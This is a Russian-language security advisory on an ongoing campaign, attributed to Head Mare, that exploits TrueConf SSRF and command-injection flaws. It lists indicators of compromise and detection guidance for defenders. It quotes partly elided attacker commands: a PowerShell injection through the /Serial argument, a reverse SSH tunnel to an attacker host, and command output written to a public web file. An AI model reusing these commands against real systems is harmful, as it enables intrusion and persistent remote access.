Хакеры атакуют российские компании с помощью уязвимостей в TrueConf

Прямо сейчас в российском сегменте быстро набирает обороты атака с эксплуатацией цепочки уязвимостей в ПО для видеоконференцсвязи TrueConf. Команды специалистов по форензике центра мониторинга и реагирования на кибератаки RED Security SOC и компании СICADA8 собрали краткое описание Kill Chain, дали индикаторы компрометации и рекомендации по защите.

Kill Chain

Попытки эксплуатации цепочки уязвимостей в большинстве случаев инициируются с выходных узлов сервиса анонимизации Proton VPN.

На первом этапе злоумышленники эксплуатируют известные уязвимости TrueConf — BDU:2025-10114 (Server-Side Request Forgery) и BDU:2025-10116 (Command Injection), опубликованные в БДУ ФСТЭК совсем недавно — в августе этого года. Разработчик решения уже выпустил обновления безопасности, однако, судя по растущему числу атак с этим вектором, во многих организациях до сих пор стоят непропатченные версии.

После успешной эксплуатации этих уязвимостей злоумышленник запускает произвольную команду оболочки cmd.exe (например, скачивание и запуск исполняемых файлов) от имени процесса tc_webmgr.exe (C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exe).

Получив доступ к удаленному выполнению команд на сервере TrueConf, атакующие проводят разведку. Вывод команд перенаправляется в файл по относительному пути ../private/css/c.css (полный путь будет C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css). Таким образом, результат выполняемых команд можно получить в качестве файла через публично доступную директорию веб‑сервера.

Следующим шагом злоумышленники создают локального пользователя с привилегированными правами доступа для дальнейшего закрепления в системе (audit, audit1). За этим следует подключение по SSH со скомпрометированного сервера к С&С-серверу злоумышленников для закрепления доступа. Закрепление в инфраструктуре происходит путем установки сервиса, указывающего на вредоносную библиотеку.

После этого злоумышленники начинают разведку инфраструктуры, чтобы выбрать дальнейший вектор атаки.

Атрибуция

Согласно данным коллег из отрасли, некоторые индикаторы относятся к группировке Head Mare. В частности, к адресу 5.178.96[.]82 на на VirusTotal дан комментарий: «C2 server Head Mare #APT Задание_на_оценку_N_2046_от_05_августа_2025_года.zip winnt64_.dll», а сама цепочка атаки совпадает с описанием коллег из BI.ZONE.

Рекомендации и индикаторы компрометации

Итак, первичный доступ получен путем эксплуатации публично доступных уязвимостей TrueConf, для которых уже существует обновление безопасности. Поэтому первое и главное: обновите ПО до самой новой версии.

Также в ходе атаки зафиксировано внедрение вредоносных библиотек и иные методы закрепления в инфраструктуре организации. Для детектирования данной активности атакующих рекомендуем:


  • осуществлять мониторинг доступа и активность процессов tc_webmgr.exe и tc_server.exe;
  • провести блокировку индикаторов компрометации на периметровом сетевом оборудовании;
  • осуществить поиск перечисленных ниже индикаторов активности злоумышленника
  • Мы рекомендуем делать первичную оценку не по индикаторам постэксплуатационной активности злоумышленника (они могут измениться в любое время), а по признакам эксплуатации цепочки уязвимостей. Соответствующие индикаторы даны ниже.

    Сетевые индикаторы (постэксплуатационная активность):

    IoCs Контекст
    5.252.178[.]171 Сервер злоумышленников
    31.57.108[.]232 Сервер злоумышленников, исходящее SSH‑подключение
    31.58.134[.]251 Сервер злоумышленников
    xbox-updater[.]online
    31.57.109[.]151
    Сервер злоумышленников
    5.178.96[.]82 Сервер злоумышленников
    185.90.60[.]227 Сервер злоумышленников

    Файловые индикаторы (постэксплуатационная активность):


    IoCs Контекст
    /Program Files/TrueConf Server/httpconf/site/private/css/c.css Файл сервера trueconf, куда выводятся результаты команд злоумышленников
     /Program Files/TrueConf Server/httpconf/site/public/r.dll
     /Program Files/TrueConf Server/httpconf/site/public/a.dll
    Внедрение вредоносных библиотек (их вызов происходит через rundll32, который запускается через ту же цепочку уязвимостей отдельной командой — после командлета Invoke-WebRequest)
    %UserProfile%\Desktop\ssh.msi
    %UserProfile%\Desktop\ssh.msi
    Установщик SSH для закрепления
    %UserProfile%\Desktop\logparse.exe %UserProfile%\Desktop\ddm\memprocfs.exe %UserProfile%\Desktop\ddm\DumpIt.exe Разведка на сервере
    %UserProfile%\Desktop\adrecon.ps1 Разведка в домене
    %UserProfile%\Desktop\psexec.exe Перемещение по хостам
    C:\Windows\System32\run.ps1 Скрипт с серверов для создания службы SscpSvc, прописывает библиотеку dfxhost.dll как ее исполняемый файл
    C:\Windows\System32\dfxhost.dll Вредоносная служба SscpSvc (бэкдор)

    Индикаторы для поиска в данных телеметрии

    Запуск SSH-туннеля (постэксплуатационная активность):

    ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...


  • Инъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):
  • cmd.exe /s /c "“C:\Program Files\TrueConf Server\tc_server.exe” /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c "..."|| /File:"D:\TrueConf\activation\offlinereg.vrg""


  • Детектирование подозрительного процесса (признак эксплуатации) сигнатурами типа LowFidelity со стороны Windows Defender (подобное срабатывание попадает только в файловый лог — C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log и C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\MPLog-*.log):
  • 2025-XX-XXTYY:YY:YY.YYY Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /s /c C:\Program Files\TrueConf Server\tc_server.exe /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c iwr ...|sc ../private/css/c.css|| /File:D:\TrueConf\activation\offlinereg.vrg)


  • Детектирование подозрительной библиотеки (постэксплуатационная активность) и сбор телеметрии со стороны Windows Defender:
  • BEGIN BM telemetry

    GUID:{4AD0B666-1A8A-B24A-0D29-F948A849D844}

    SignatureID:94230468382436

    SigSha:e785adfba47a55a5a94699b391ee10a9299d593f

    ThreatLevel:0

    ProcessID:15244

    ProcessCreationTime:X

    SessionID:0

    CreationTime:X

    ImagePath:C:\Windows\System32\rundll32.exe

    Taint Info:Friendly: Y; Reason: ; Modules: C:\Program Files\TrueConf Server\httpconf\site\public\r.dll:25,; Parents:

    C:\Windows\System32\cmd.exe:15764:1,C:\Windows\System32\lsass.exe:900:2,

    Operations:None

    END BM telemetry


  • Журнал ошибок веб-сервера TrueConf также может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log): error: the required argument for option '--Serial' is missing
  • Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплоитов, где до инъекции указывается корректный ключ активации.

    В этом же журнале могут быть и следы постэксплуатационной активности (вывод stderr – утилит, которые не должны штатно запускаться от веб-сервера).


  • Вывод curl:
  • curl : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.

    At line:1 char:1

    + curl ident.me|sc ../private/css/c.css

    + ~~~~~~~~~~~~~

    + CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException

    + FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand


  • Вывод ssh:
  • Warning: Permanently added '[xxx]:443' (ED25519) to the list of known hosts.

    Используемые техники

    1. Initial Access (TA0001)
    2. - Exploit Public-Facing Application (T1190)


    3. Execution (TA0002)
    4. - Command and Scripting Interpreter: PowerShell (T1059.001)

      - Command and Scripting Interpreter: Windows Command Shell (T1059.003)

      - System Binary Proxy Execution: Rundll32 (T1218.011)


    5. Persistence (TA0003)
    6. - Create Account: Local Account (T1136.001)

      - Valid Accounts: Domain Accounts (T1078.002)

      - Valid Accounts: Local Accounts (T1078.003)

      - Create or Modify System Process: Windows Service (T1543.003)


    7. Credential Access (TA0006)
    8. - OS Credential Dumping: LSASS Memory (T1003.001)


    9. Discovery (TA0007)
    10. - Account Discovery: Local Account (T1087.001)

      - Network Service Discovery (T1046)


    11. Lateral Movement (TA0008)
    12. - Remote Services: Remote Desktop Protocol (T1021.001)


    13. Command and Control (TA0011)

    - Protocol Tunneling (T1572)